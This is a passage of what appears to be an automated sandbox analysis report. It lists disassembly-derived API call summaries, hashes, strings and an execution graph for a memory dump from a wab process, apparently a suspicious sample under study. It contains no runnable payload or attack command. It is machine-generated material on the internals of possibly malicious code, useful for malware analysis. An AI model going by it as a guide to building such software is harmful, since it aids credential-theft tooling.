                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$DialogHandleModuleParam
                                    • String ID:
                                    • API String ID: 1386444988-0
                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@
                                    • String ID:
                                    • API String ID: 613200358-0
                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                    APIs
                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: InvalidateMessageRectSend
                                    • String ID: d=E
                                    • API String ID: 909852535-3703654223
                                    • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                    • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                    APIs
                                    • wcschr.MSVCRT ref: 0040F79E
                                    • wcschr.MSVCRT ref: 0040F7AC
                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: wcschr$memcpywcslen
                                    • String ID: "
                                    • API String ID: 1983396471-123907689
                                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                    APIs
                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                    • _memicmp.MSVCRT ref: 0040C00D
                                    • memcpy.MSVCRT ref: 0040C024
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FilePointer_memicmpmemcpy
                                    • String ID: URL
                                    • API String ID: 2108176848-3574463123
                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _snwprintfmemcpy
                                    • String ID: %2.2X
                                    • API String ID: 2789212964-323797159
                                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _snwprintf
                                    • String ID: %%-%d.%ds
                                    • API String ID: 3988819677-2008345750
                                    • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                    • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                    APIs
                                    • memset.MSVCRT ref: 0040E770
                                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: MessageSendmemset
                                    • String ID: F^@
                                    • API String ID: 568519121-3652327722
                                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: PlacementWindowmemset
                                    • String ID: WinPos
                                    • API String ID: 4036792311-2823255486
                                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                    APIs
                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                    • wcscat.MSVCRT ref: 0040DCFF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FileModuleNamewcscatwcsrchr
                                    • String ID: _lng.ini
                                    • API String ID: 383090722-1948609170
                                    • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                    • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                    APIs
                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                    • API String ID: 2773794195-880857682
                                    • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                    • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$memset
                                    • String ID:
                                    • API String ID: 438689982-0
                                    • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                    • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@$memset
                                    • String ID:
                                    • API String ID: 1860491036-0
                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                    APIs
                                    • memcmp.MSVCRT ref: 00408AF3
                                      • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                    • memcmp.MSVCRT ref: 00408B2B
                                    • memcmp.MSVCRT ref: 00408B5C
                                    • memcpy.MSVCRT ref: 00408B79
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcmp$memcpy
                                    • String ID:
                                    • API String ID: 231171946-0
                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: wcslen$wcscat$wcscpy
                                    • String ID:
                                    • API String ID: 1961120804-0
                                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                    Execution Graph

                                    Execution Coverage:2.4%
                                    Dynamic/Decrypted Code Coverage:20.5%
                                    Signature Coverage:0.5%
                                    Total number of Nodes:844
                                    Total number of Limit Nodes:16
                                    execution_graph 34106 40fc40 70 API calls 34279 403640 21 API calls 34107 427fa4 42 API calls 34280 412e43 _endthreadex 34281 425115 76 API calls __fprintf_l 34282 43fe40 133 API calls 34110 425115 83 API calls __fprintf_l 34111 401445 memcpy memcpy DialogBoxParamA 34112 440c40 34 API calls 33240 444c4a 33259 444e38 33240->33259 33242 444c56 GetModuleHandleA 33243 444c68 __set_app_type __p__fmode __p__commode 33242->33243 33245 444cfa 33243->33245 33246 444d02 __setusermatherr 33245->33246 33247 444d0e 33245->33247 33246->33247 33260 444e22 _controlfp 33247->33260 33249 444d13 _initterm __getmainargs _initterm 33250 444d6a GetStartupInfoA 33249->33250 33252 444d9e GetModuleHandleA 33250->33252 33261 40cf44 33252->33261 33256 444dcf _cexit 33258 444e04 33256->33258 33257 444dc8 exit 33257->33256 33259->33242 33260->33249 33312 404a99 LoadLibraryA 33261->33312 33263 40cf60 33300 40cf64 33263->33300 33319 410d0e 33263->33319 33265 40cf6f 33323 40ccd7 ??2@YAPAXI 33265->33323 33267 40cf9b 33337 407cbc 33267->33337 33272 40cfc4 33355 409825 memset 33272->33355 33273 40cfd8 33360 4096f4 memset 33273->33360 33278 40d181 ??3@YAXPAX 33280 40d1b3 33278->33280 33281 40d19f DeleteObject 33278->33281 33279 407e30 _strcmpi 33282 40cfee 33279->33282 33384 407948 ??3@YAXPAX ??3@YAXPAX 33280->33384 33281->33280 33284 40cff2 RegDeleteKeyA 33282->33284 33285 40d007 EnumResourceTypesA 33282->33285 33284->33278 33287 40d047 33285->33287 33288 40d02f MessageBoxA 33285->33288 33286 40d1c4 33385 4080d4 ??3@YAXPAX 33286->33385 33290 40d0a0 CoInitialize 33287->33290 33365 40ce70 33287->33365 33288->33278 33382 40cc26 strncat memset RegisterClassA CreateWindowExA 33290->33382 33292 40d1cd 33386 407948 ??3@YAXPAX ??3@YAXPAX 33292->33386 33295 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33383 40c256 PostMessageA 33295->33383 33297 40d061 ??3@YAXPAX 33297->33280 33301 40d084 DeleteObject 33297->33301 33298 40d09e 33298->33290 33300->33256 33300->33257 33301->33280 33304 40d0f9 GetMessageA 33305 40d17b 33304->33305 33306 40d10d 33304->33306 33305->33278 33307 40d113 TranslateAccelerator 33306->33307 33309 40d145 IsDialogMessage 33306->33309 33310 40d139 IsDialogMessage 33306->33310 33307->33306 33308 40d16d GetMessageA 33307->33308 33308->33305 33308->33307 33309->33308 33311 40d157 TranslateMessage DispatchMessageA 33309->33311 33310->33308 33310->33309 33311->33308 33313 404ac4 GetProcAddress 33312->33313 33314 404ae8 33312->33314 33315 404ad4 33313->33315 33316 404add FreeLibrary 33313->33316 33317 404b13 33314->33317 33318 404afc MessageBoxA 33314->33318 33315->33316 33316->33314 33317->33263 33318->33263 33320 410d17 LoadLibraryA 33319->33320 33321 410d3c 33319->33321 33320->33321 33322 410d2b GetProcAddress 33320->33322 33321->33265 33322->33321 33324 40cd08 ??2@YAPAXI 33323->33324 33326 40cd26 33324->33326 33327 40cd2d 33324->33327 33394 404025 6 API calls 33326->33394 33329 40cd66 33327->33329 33330 40cd59 DeleteObject 33327->33330 33387 407088 33329->33387 33330->33329 33332 40cd6b 33390 4019b5 33332->33390 33335 4019b5 strncat 33336 40cdbf _mbscpy 33335->33336 33336->33267 33396 407948 ??3@YAXPAX ??3@YAXPAX 33337->33396 33339 407e04 33397 407a55 33339->33397 33342 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33349 407cf7 33342->33349 33343 407ddc 33343->33339 33409 407a1f 33343->33409 33345 407d7a ??3@YAXPAX 33345->33349 33349->33339 33349->33342 33349->33343 33349->33345 33400 40796e 7 API calls 33349->33400 33401 406f30 33349->33401 33351 407e30 33352 407e57 33351->33352 33353 407e38 33351->33353 33352->33272 33352->33273 33353->33352 33354 407e41 _strcmpi 33353->33354 33354->33352 33354->33353 33415 4097ff 33355->33415 33357 409854 33420 409731 33357->33420 33361 4097ff 3 API calls 33360->33361 33362 409723 33361->33362 33440 40966c 33362->33440 33454 4023b2 33365->33454 33371 40ced3 33543 40cdda 7 API calls 33371->33543 33372 40cece 33375 40cf3f 33372->33375 33495 40c3d0 memset GetModuleFileNameA strrchr 33372->33495 33375->33297 33375->33298 33378 40ceed 33522 40affa 33378->33522 33382->33295 33383->33304 33384->33286 33385->33292 33386->33300 33395 406fc7 memset _mbscpy 33387->33395 33389 40709f CreateFontIndirectA 33389->33332 33391 4019e1 33390->33391 33392 4019c2 strncat 33391->33392 33393 4019e5 memset LoadIconA 33391->33393 33392->33391 33393->33335 33394->33327 33395->33389 33396->33349 33398 407a65 33397->33398 33399 407a5b ??3@YAXPAX 33397->33399 33398->33351 33399->33398 33400->33349 33402 406f37 malloc 33401->33402 33403 406f7d 33401->33403 33405 406f73 33402->33405 33406 406f58 33402->33406 33403->33349 33405->33349 33407 406f6c ??3@YAXPAX 33406->33407 33408 406f5c memcpy 33406->33408 33407->33405 33408->33407 33410 407a38 33409->33410 33411 407a2d ??3@YAXPAX 33409->33411 33413 406f30 3 API calls 33410->33413 33412 407a43 33411->33412 33414 40796e 7 API calls 33412->33414 33413->33412 33414->33339 33431 406f96 GetModuleFileNameA 33415->33431 33417 409805 strrchr 33418 409814 33417->33418 33419 409817 _mbscat 33417->33419 33418->33419 33419->33357 33432 44b090 33420->33432 33425 40930c 3 API calls 33426 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33425->33426 33427 4097c5 LoadStringA 33426->33427 33428 4097db 33427->33428 33428->33427 33430 4097f3 33428->33430 33439 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33428->33439 33430->33278 33431->33417 33433 40973e _mbscpy _mbscpy 33432->33433 33434 40930c 33433->33434 33435 44b090 33434->33435 33436 409319 memset GetPrivateProfileStringA 33435->33436 33437 409374 33436->33437 33438 409364 WritePrivateProfileStringA 33436->33438 33437->33425 33438->33437 33439->33428 33450 406f81 GetFileAttributesA 33440->33450 33442 409675 33443 4096ee 33442->33443 33444 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33442->33444 33443->33279 33451 409278 GetPrivateProfileStringA 33444->33451 33446 4096c9 33452 409278 GetPrivateProfileStringA 33446->33452 33448 4096da 33453 409278 GetPrivateProfileStringA 33448->33453 33450->33442 33451->33446 33452->33448 33453->33443 33545 409c1c 33454->33545 33457 401e69 memset 33584 410dbb 33457->33584 33460 401ec2 33614 4070e3 strlen _mbscat _mbscpy _mbscat 33460->33614 33461 401ed4 33599 406f81 GetFileAttributesA 33461->33599 33464 401ee6 strlen strlen 33466 401f15 33464->33466 33468 401f28 33464->33468 33615 4070e3 strlen _mbscat _mbscpy _mbscat 33466->33615 33600 406f81 GetFileAttributesA 33468->33600 33470 401f35 33601 401c31 33470->33601 33473 401f75 33613 410a9c RegOpenKeyExA 33473->33613 33474 401c31 7 API calls 33474->33473 33476 401f91 33477 402187 33476->33477 33478 401f9c memset 33476->33478 33480 402195 ExpandEnvironmentStringsA 33477->33480 33481 4021a8 _strcmpi 33477->33481 33616 410b62 RegEnumKeyExA 33478->33616 33625 406f81 GetFileAttributesA 33480->33625 33481->33371 33481->33372 33483 40217e RegCloseKey 33483->33477 33484 401fd9 atoi 33485 401fef memset memset sprintf 33484->33485 33492 401fc9 33484->33492 33617 410b1e 33485->33617 33488 402165 33488->33483 33489 402076 memset memset strlen strlen 33489->33492 33490 4070e3 strlen _mbscat _mbscpy _mbscat 33490->33492 33491 4020dd strlen strlen 33491->33492 33492->33483 33492->33484 33492->33488 33492->33489 33492->33490 33492->33491 33493 406f81 GetFileAttributesA 33492->33493 33494 402167 _mbscpy 33492->33494 33624 410b62 RegEnumKeyExA 33492->33624 33493->33492 33494->33483 33496 40c422 33495->33496 33497 40c425 _mbscat _mbscpy _mbscpy 33495->33497 33496->33497 33498 40c49d 33497->33498 33499 40c512 33498->33499 33500 40c502 GetWindowPlacement 33498->33500 33501 40c538 33499->33501 33646 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33499->33646 33500->33499 33639 409b31 33501->33639 33505 40ba28 33506 40ba87 33505->33506 33512 40ba3c 33505->33512 33649 406c62 LoadCursorA SetCursor 33506->33649 33508 40ba43 _mbsicmp 33508->33512 33509 40ba8c 33650 410a9c RegOpenKeyExA 33509->33650 33651 404734 33509->33651 33659 4107f1 33509->33659 33662 404785 33509->33662 33665 403c16 33509->33665 33510 40baa0 33511 407e30 _strcmpi 33510->33511 33515 40bab0 33511->33515 33512->33506 33512->33508 33741 40b5e5 10 API calls 33512->33741 33513 40bafa SetCursor 33513->33378 33515->33513 33516 40baf1 qsort 33515->33516 33516->33513 34099 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33522->34099 33524 40b00e 33525 40b016 33524->33525 33526 40b01f GetStdHandle 33524->33526 34100 406d1a CreateFileA 33525->34100 33528 40b01c 33526->33528 33529 40b035 33528->33529 33530 40b12d 33528->33530 34101 406c62 LoadCursorA SetCursor 33529->34101 34105 406d77 9 API calls 33530->34105 33533 40b136 33544 40c580 28 API calls 33533->33544 33534 40b042 33536 40b087 33534->33536 33541 40b0a1 33534->33541 34102 40a57c strlen WriteFile 33534->34102 33536->33541 34103 40a699 12 API calls 33536->34103 33538 40b0d6 33539 40b116 CloseHandle 33538->33539 33540 40b11f SetCursor 33538->33540 33539->33540 33540->33533 33541->33538 34104 406d77 9 API calls 33541->34104 33543->33372 33544->33375 33557 409a32 33545->33557 33548 409c80 memcpy memcpy 33549 409cda 33548->33549 33549->33548 33550 409d18 ??2@YAPAXI ??2@YAPAXI 33549->33550 33554 408db6 12 API calls 33549->33554 33552 409d54 ??2@YAPAXI 33550->33552 33553 409d8b 33550->33553 33552->33553 33567 409b9c 33553->33567 33554->33549 33556 4023c1 33556->33457 33558 409a44 33557->33558 33559 409a3d ??3@YAXPAX 33557->33559 33560 409a52 33558->33560 33561 409a4b ??3@YAXPAX 33558->33561 33559->33558 33562 409a63 33560->33562 33563 409a5c ??3@YAXPAX 33560->33563 33561->33560 33564 409a83 ??2@YAPAXI ??2@YAPAXI 33562->33564 33565 409a73 ??3@YAXPAX 33562->33565 33566 409a7c ??3@YAXPAX 33562->33566 33563->33562 33564->33548 33565->33566 33566->33564 33568 407a55 ??3@YAXPAX 33567->33568 33569 409ba5 33568->33569 33570 407a55 ??3@YAXPAX 33569->33570 33571 409bad 33570->33571 33572 407a55 ??3@YAXPAX 33571->33572 33573 409bb5 33572->33573 33574 407a55 ??3@YAXPAX 33573->33574 33575 409bbd 33574->33575 33576 407a1f 4 API calls 33575->33576 33577 409bd0 33576->33577 33578 407a1f 4 API calls 33577->33578 33579 409bda 33578->33579 33580 407a1f 4 API calls 33579->33580 33581 409be4 33580->33581 33582 407a1f 4 API calls 33581->33582 33583 409bee 33582->33583 33583->33556 33585 410d0e 2 API calls 33584->33585 33586 410dca 33585->33586 33587 410dfd memset 33586->33587 33626 4070ae 33586->33626 33588 410e1d 33587->33588 33629 410a9c RegOpenKeyExA 33588->33629 33591 401e9e strlen strlen 33591->33460 33591->33461 33593 410e4a 33594 410e7f _mbscpy 33593->33594 33630 410d3d _mbscpy 33593->33630 33594->33591 33596 410e5b 33631 410add RegQueryValueExA 33596->33631 33598 410e73 RegCloseKey 33598->33594 33599->33464 33600->33470 33632 410a9c RegOpenKeyExA 33601->33632 33603 401c4c 33604 401cad 33603->33604 33633 410add RegQueryValueExA 33603->33633 33604->33473 33604->33474 33606 401c6a 33607 401c71 strchr 33606->33607 33608 401ca4 RegCloseKey 33606->33608 33607->33608 33609 401c85 strchr 33607->33609 33608->33604 33609->33608 33610 401c94 33609->33610 33634 406f06 strlen 33610->33634 33612 401ca1 33612->33608 33613->33476 33614->33461 33615->33468 33616->33492 33637 410a9c RegOpenKeyExA 33617->33637 33619 410b34 33620 410b5d 33619->33620 33638 410add RegQueryValueExA 33619->33638 33620->33492 33622 410b4c RegCloseKey 33622->33620 33624->33492 33625->33481 33627 4070bd GetVersionExA 33626->33627 33628 4070ce 33626->33628 33627->33628 33628->33587 33628->33591 33629->33593 33630->33596 33631->33598 33632->33603 33633->33606 33635 406f17 33634->33635 33636 406f1a memcpy 33634->33636 33635->33636 33636->33612 33637->33619 33638->33622 33640 409b40 33639->33640 33642 409b4e 33639->33642 33647 409901 memset SendMessageA 33640->33647 33643 409b99 33642->33643 33644 409b8b 33642->33644 33643->33505 33648 409868 SendMessageA 33644->33648 33646->33501 33647->33642 33648->33643 33649->33509 33650->33510 33652 404785 FreeLibrary 33651->33652 33653 40473b LoadLibraryA 33652->33653 33654 40474c GetProcAddress 33653->33654 33657 40476e 33653->33657 33655 404764 33654->33655 33654->33657 33655->33657 33656 404781 33656->33510 33657->33656 33658 404785 FreeLibrary 33657->33658 33658->33656 33660 410807 33659->33660 33661 4107fc FreeLibrary 33659->33661 33660->33510 33661->33660 33663 4047a3 33662->33663 33664 404799 FreeLibrary 33662->33664 33663->33510 33664->33663 33666 4107f1 FreeLibrary 33665->33666 33667 403c30 LoadLibraryA 33666->33667 33668 403c74 33667->33668 33669 403c44 GetProcAddress 33667->33669 33670 4107f1 FreeLibrary 33668->33670 33669->33668 33671 403c5e 33669->33671 33672 403c7b 33670->33672 33671->33668 33674 403c6b 33671->33674 33673 404734 3 API calls 33672->33673 33675 403c86 33673->33675 33674->33672 33742 4036e5 33675->33742 33678 4036e5 26 API calls 33679 403c9a 33678->33679 33680 4036e5 26 API calls 33679->33680 33681 403ca4 33680->33681 33682 4036e5 26 API calls 33681->33682 33683 403cae 33682->33683 33754 4085d2 33683->33754 33691 403ce5 33692 403cf7 33691->33692 33935 402bd1 39 API calls 33691->33935 33800 410a9c RegOpenKeyExA 33692->33800 33695 403d0a 33696 403d1c 33695->33696 33936 402bd1 39 API calls 33695->33936 33801 402c5d 33696->33801 33700 4070ae GetVersionExA 33701 403d31 33700->33701 33819 410a9c RegOpenKeyExA 33701->33819 33703 403d51 33704 403d61 33703->33704 33937 402b22 46 API calls 33703->33937 33820 410a9c RegOpenKeyExA 33704->33820 33707 403d87 33708 403d97 33707->33708 33938 402b22 46 API calls 33707->33938 33821 410a9c RegOpenKeyExA 33708->33821 33711 403dbd 33712 403dcd 33711->33712 33939 402b22 46 API calls 33711->33939 33822 410808 33712->33822 33716 404785 FreeLibrary 33717 403de8 33716->33717 33826 402fdb 33717->33826 33720 402fdb 34 API calls 33721 403e00 33720->33721 33842 4032b7 